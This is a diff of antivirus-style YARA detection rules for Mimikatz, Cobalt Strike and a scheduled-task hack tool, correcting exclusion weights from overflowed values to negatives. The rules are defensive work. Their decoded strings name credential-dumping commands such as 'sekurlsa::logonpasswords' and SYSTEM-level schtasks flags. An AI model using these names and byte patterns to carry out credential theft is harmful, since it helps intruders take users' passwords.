$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_01_0 & 1)*100+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516) >=103
|
||||
((#a_01_0 & 1)*100+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20) >=103
|
||||
|
||||
}
|
||||
|
|
@ -45,15 +45,15 @@ rule HackTool_Win32_Mimikatz_A_dha_3{
|
|||
$a_01_3 = {63 00 72 00 65 00 64 00 6d 00 61 00 6e 00 } //1 credman
|
||||
$a_01_4 = {6c 00 73 00 61 00 73 00 72 00 76 00 } //1 lsasrv
|
||||
$a_01_5 = {6c 00 6f 00 67 00 6f 00 6e 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 73 00 } //1 logonPasswords
|
||||
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516) >=6
|
||||
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20) >=6
|
||||
|
||||
}
|
||||
rule HackTool_Win32_Mimikatz_A_dha_4{
|
||||
|
|
@ -70,14 +70,14 @@ rule HackTool_Win32_Mimikatz_A_dha_4{
|
|||
$a_01_6 = {77 00 64 00 69 00 67 00 65 00 73 00 74 00 2e 00 64 00 6c 00 6c 00 } //1 wdigest.dll
|
||||
$a_01_7 = {6c 00 6f 00 67 00 6f 00 6e 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 73 00 } //1 logonPasswords
|
||||
$a_01_8 = {63 00 72 00 65 00 64 00 6d 00 61 00 6e 00 } //1 credman
|
||||
$a_80_9 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_10 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_11 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
$a_80_12 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_15 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_9 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_10 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
$a_80_11 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_12 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_13 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_14 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_15 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_01_0 & 1)*2+(#a_01_1 & 1)*2+(#a_01_2 & 1)*2+(#a_00_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516+(#a_80_14 & 1)*65516+(#a_80_15 & 1)*65516) >=7
|
||||
((#a_01_0 & 1)*2+(#a_01_1 & 1)*2+(#a_01_2 & 1)*2+(#a_00_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20+(#a_80_14 & 1)*-20+(#a_80_15 & 1)*-20) >=7
|
||||
|
||||
}
|
||||
|
|
@ -19,14 +19,14 @@ rule HackTool_Win32_Mimikatz_C__2{
|
|||
$a_02_0 = {6d 69 6d 69 6b 61 74 7a 20 90 02 02 2e 90 02 02 2e 90 02 02 20 28 78 90 01 02 29 20 62 75 69 6c 74 20 6f 6e 90 00 } //10
|
||||
$a_00_1 = {73 00 65 00 6b 00 75 00 72 00 6c 00 73 00 61 00 3a 00 3a 00 6c 00 6f 00 67 00 6f 00 6e 00 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 73 00 } //10 sekurlsa::logonpasswords
|
||||
$a_00_2 = {64 00 65 00 6c 00 65 00 74 00 69 00 6e 00 67 00 20 00 43 00 3a 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 54 00 65 00 6d 00 70 00 5c 00 64 00 65 00 62 00 75 00 67 00 2e 00 62 00 69 00 6e 00 0a 00 00 00 } //10
|
||||
$a_80_3 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_4 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_5 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
$a_80_6 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_7 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_8 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_9 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_3 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_4 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
$a_80_5 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_6 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_7 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_8 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_9 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_02_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_80_3 & 1)*65516+(#a_80_4 & 1)*65516+(#a_80_5 & 1)*65516+(#a_80_6 & 1)*65516+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516) >=30
|
||||
((#a_02_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_80_3 & 1)*-20+(#a_80_4 & 1)*-20+(#a_80_5 & 1)*-20+(#a_80_6 & 1)*-20+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20) >=30
|
||||
|
||||
}
|
||||
|
|
@ -11,14 +11,14 @@ rule HackTool_Win32_Mimikatz_D_{
|
|||
$a_00_4 = {70 6f 77 65 72 73 68 65 6c 6c 5f 72 65 66 6c 65 63 74 69 76 65 5f 6d 69 6d 69 6b 61 74 7a } //1 powershell_reflective_mimikatz
|
||||
$a_00_5 = {70 6f 77 65 72 6b 61 74 7a 2e 64 6c 6c } //1 powerkatz.dll
|
||||
$a_00_6 = {5f 4e 65 74 53 65 72 76 65 72 54 72 75 73 74 50 61 73 73 77 6f 72 64 73 47 65 74 } //1 _NetServerTrustPasswordsGet
|
||||
$a_80_7 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_8 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_9 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
$a_80_10 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_13 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_7 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_8 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
$a_80_9 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip -20
|
||||
$a_80_10 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb -20
|
||||
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s -20
|
||||
$a_80_12 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s -20
|
||||
$a_80_13 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb -20
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_80_7 & 1)*65516+(#a_80_8 & 1)*65516+(#a_80_9 & 1)*65516+(#a_80_10 & 1)*65516+(#a_80_11 & 1)*65516+(#a_80_12 & 1)*65516+(#a_80_13 & 1)*65516) >=5
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_80_7 & 1)*-20+(#a_80_8 & 1)*-20+(#a_80_9 & 1)*-20+(#a_80_10 & 1)*-20+(#a_80_11 & 1)*-20+(#a_80_12 & 1)*-20+(#a_80_13 & 1)*-20) >=5
|
||||
|
||||
}
|
||||
|
|
@ -9,8 +9,8 @@ rule HackTool_Win32_SystemSchtaskFromPublicUser_A{
|
|||
$a_00_2 = {2f 00 53 00 43 00 20 00 4f 00 4e 00 4c 00 4f 00 47 00 4f 00 4e 00 } //1 /SC ONLOGON
|
||||
$a_00_3 = {2f 00 52 00 55 00 20 00 73 00 79 00 73 00 74 00 65 00 6d 00 } //1 /RU system
|
||||
$a_00_4 = {43 00 3a 00 5c 00 55 00 73 00 65 00 72 00 73 00 5c 00 50 00 75 00 62 00 6c 00 69 00 63 00 5c 00 } //1 C:\Users\Public\
|
||||
$a_00_5 = {61 00 75 00 74 00 6f 00 6d 00 61 00 74 00 65 00 } //65526 automate
|
||||
$a_00_5 = {61 00 75 00 74 00 6f 00 6d 00 61 00 74 00 65 00 } //-10 automate
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*65526) >=14
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*-10) >=14
|
||||
|
||||
}
|
||||
|
|
@ -10,11 +10,11 @@ rule HackTool_Win64_CobaltStrike_B{
|
|||
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
|
||||
$a_01_4 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
|
||||
$a_03_5 = {48 ff c0 48 3d 00 10 00 00 7c f1 90 09 04 00 80 90 01 02 90 17 03 01 01 01 2e 69 4e 48 90 00 } //10
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_03_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -9,11 +9,11 @@ rule HackTool_Win64_CobaltStrike_B_{
|
|||
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
|
||||
$a_01_3 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
|
||||
$a_03_4 = {48 ff c0 48 3d 00 10 00 00 7c f1 90 09 04 00 80 90 01 02 90 03 01 01 2e 69 48 90 00 } //10
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*65436+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*10+(#a_01_5 & 1)*-100+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -10,11 +10,11 @@ rule HackTool_Win64_CobaltStrike_C{
|
|||
$a_03_3 = {4e 4f 4e 4f 4e 4c 90 01 02 4e 4c 4e 4f 4e 4c 90 00 } //1
|
||||
$a_01_4 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
|
||||
$a_01_5 = {0f af d1 44 8b c8 b8 1f 85 eb 51 f7 e2 41 8b c1 44 8b c2 33 d2 41 c1 e8 05 41 f7 f0 } //10
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_6 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_7 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_8 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
$a_01_9 = {48 61 63 6b 54 6f 6f 6c 3a } //-100 HackTool:
|
||||
condition:
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*10+(#a_01_6 & 1)*65436+(#a_01_7 & 1)*65436+(#a_01_8 & 1)*65436+(#a_01_9 & 1)*65436) >=11
|
||||
((#a_03_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*10+(#a_01_6 & 1)*-100+(#a_01_7 & 1)*-100+(#a_01_8 & 1)*-100+(#a_01_9 & 1)*-100) >=11
|
||||
|
||||
}
|
||||
|
|
@ -9,11 +9,11 @@ rule HackTool_Win64_CobaltStrike_C_{
|
|||
$a_03_2 = {2e 2f 2e 2f 2e 2c 90 01 02 2e 2c 2e 2f 2e 2c 90 00 } //1
|
||||
$a_01_3 = {4c 63 c2 4d 03 c0 42 0f 10 04 c0 48 8b c1 f3 0f 7f 01 c3 } //1
|
||||
$a_01_4 = {0f af d1 44 8b c8 b8 1f 85 eb 51 f7 e2 41 8b c1 44 8b c2 33 d2 41 c1 e8 05 41 f7 f0 } //10
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //65436 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //65436 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //65436 mpattribute
|
||||
$a_01_8 = {48 61 63 6b 54 6f 6f 6c 3a } //65436 HackTool:
|
||||
$a_01_5 = {42 65 68 61 76 69 6f 72 3a } //-100 Behavior:
|
||||
$a_01_6 = {54 72 6f 6a 61 6e 3a } //-100 Trojan:
|
||||
$a_01_7 = {6d 70 61 74 74 72 69 62 75 74 65 } //-100 mpattribute
|
||||
